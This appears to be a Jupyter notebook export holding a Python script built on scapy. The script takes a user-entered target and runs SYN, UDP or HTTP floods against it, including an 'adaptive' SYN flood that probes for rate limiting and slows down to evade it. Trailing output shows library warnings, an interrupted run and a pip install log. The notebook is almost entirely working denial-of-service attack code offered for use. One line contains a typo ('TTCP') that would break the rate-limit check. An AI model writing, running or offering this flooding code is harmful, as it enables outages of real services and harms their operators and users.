In [ ]:
import logging
import socket
import time
import random
from scapy.all import IP, TCP, UDP, send, sr1

# Configure logging
logging.basicConfig(filename='attack_report.log', level=logging.INFO, format='%(asctime)s - %(message)s')

def detect_rate_limiting(target_ip, target_port, timeout=1):
    logging.info(f"Checking for rate limiting on {target_ip}:{target_port}")
    syn_packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")
    response = sr1(syn_packet, timeout=timeout, verbose=0)

    if response:
        if response.haslayer(TCP) and response.getlayer(TTCP).flags == "SA":
            logging.info("No rate limiting detected")
            return False  # Not rate-limited
        elif response.haslayer(TCP) and response.getlayer(TCP).flags == "R":
            logging.warning("Rate-limiting detected")
            return True  # Rate-limited
    logging.warning("No response, may be rate-limited")
    return False  # No response

def adaptive_flood(target_ip, target_port, duration):
    logging.info(f"Starting adaptive SYN flood on {target_ip}:{target_port} for {duration} seconds")

    start_time = time.time()
    packet_count = 0

    while time.time() - start_time < duration:
        if detect_rate_limiting(target_ip, target_port):
            logging.info("Rate-limited detected, slowing down attack...")
            time.sleep(random.uniform(0.5, 1.5))  # Slow down if rate-limited
        else:
            logging.info("No rate limit detected, continuing at normal speed...")

        ip_packet = IP(dst=target_ip)
        tcp_packet = TCP(dport=target_port, flags='S')
        packet = ip_packet / tcp_packet

        # Send the packet
        send(packet, verbose=0)
        packet_count += 1

        logging.info(f"Packet {packet_count} sent")
        time.sleep(random.uniform(0.1, 0.3))  # Adaptive delay between packets

    logging.info(f"Adaptive flood finished, total packets sent: {packet_count}")

def udp_flood(target_ip, target_port, duration):
    logging.info(f"Starting UDP flood on {target_ip}:{target_port} for {duration} seconds")
    start_time = time.time()
    packet_count = 0
    while time.time() - start_time < duration:
        ip_packet = IP(dst=target_ip)
        udp_packet = UDP(dport=target_port)
        send(ip_packet/udp_packet, verbose=0)
        packet_count += 1
        logging.info(f"Packet {packet_count} sent")
        time.sleep(random.uniform(0.1, 0.3))  # Adaptive delay
    logging.info(f"UDP flood finished, total packets sent: {packet_count}")

def http_flood(target_ip, target_port, duration):
    logging.info(f"Starting HTTP flood on {target_ip}:{target_port} for {duration} seconds")
    start_time = time.time()
    packet_count = 0
    while time.time() - start_time < duration:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((target_ip, target_port))
            request = f"GET / HTTP/1.1\r\nHost: {target_ip}\r\n\r\n"
            sock.send(request.encode())
            packet_count += 1
            logging.info(f"HTTP request {packet_count} sent")
            sock.close()
        except socket.error:
            logging.warning("Socket error occurred, skipping this packet.")
        time.sleep(random.uniform(0.1, 0.3))  # Adaptive delay
    logging.info(f"HTTP flood finished, total requests sent: {packet_count}")

def simulate_legitimate_traffic(target_ip, target_port):
    logging.info(f"Simulating legitimate traffic on {target_ip}:{target_port}")
    ip_packet = IP(dst=target_ip)
    syn_packet = TCP(dport=target_port, flags='S')

    syn_ack_response = sr1(ip_packet/syn_packet, timeout=1, verbose=0)

    if syn_ack_response and syn_ack_response.haslayer(TCP) and syn_ack_response.getlayer(TCP).flags == "SA":
        logging.info("SYN-ACK received, completing handshake with ACK...")
        ack_packet = TCP(dport=target_port, flags='A', seq=syn_ack_response.getlayer(TCP).ack, ack=syn_ack_response.getlayer(TCP).seq + 1)
        send(ip_packet/ack_packet, verbose=0)
        logging.info("Legitimate TCP connection established.")
    else:
        logging.warning("No SYN-ACK received, handshake not completed.")

def get_user_input():
    target_ip = input("Enter the target IP address: ")
    target_port = int(input("Enter the target port number: "))
    duration = int(input("Enter the attack duration (in seconds): "))
    attack_type = input("Choose attack type (syn_flood, udp_flood, http_flood, simulate_legitimate): ").strip()

    return target_ip, target_port, duration, attack_type

def attack(target_ip, target_port, duration, attack_type):
    logging.info(f"Attack initiated: {attack_type}")

    if attack_type == "syn_flood":
        adaptive_flood(target_ip, target_port, duration)
    elif attack_type == "udp_flood":
        udp_flood(target_ip, target_port, duration)
    elif attack_type == "http_flood":
        http_flood(target_ip, target_port, duration)
    elif attack_type == "simulate_legitimate":
        simulate_legitimate_traffic(target_ip, target_port)
    else:
        logging.error("Unknown attack type.")

if __name__ == "__main__":
    target_ip, target_port, duration, attack_type = get_user_input()
    attack(target_ip, target_port, duration, attack_type)


/usr/local/lib/python3.10/dist-packages/scapy/layers/ipsec.py:512: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
  cipher=algorithms.TripleDES,
/usr/local/lib/python3.10/dist-packages/scapy/layers/ipsec.py:516: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
  cipher=algorithms.TripleDES,


KeyboardInterrupt: Interrupted by user

In [ ]:
pip install scapy


     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.3/1.3 MB 34.8 MB/s eta 0:00:00
  Preparing metadata (setup.py) ... done
  Created wheel for scapy: filename=scapy-2.5.0-py2.py3-none-any.whl size=1444319 sha256=45aeab58dff6e094a618939e13602855aa3daaee86ac2af1966a2fffd96132dd
  Stored in directory: /root/.cache/pip/wheels/82/b7/03/8344d8cf6695624746311bc0d389e9d05535ca83c35f90241d
Successfully built scapy
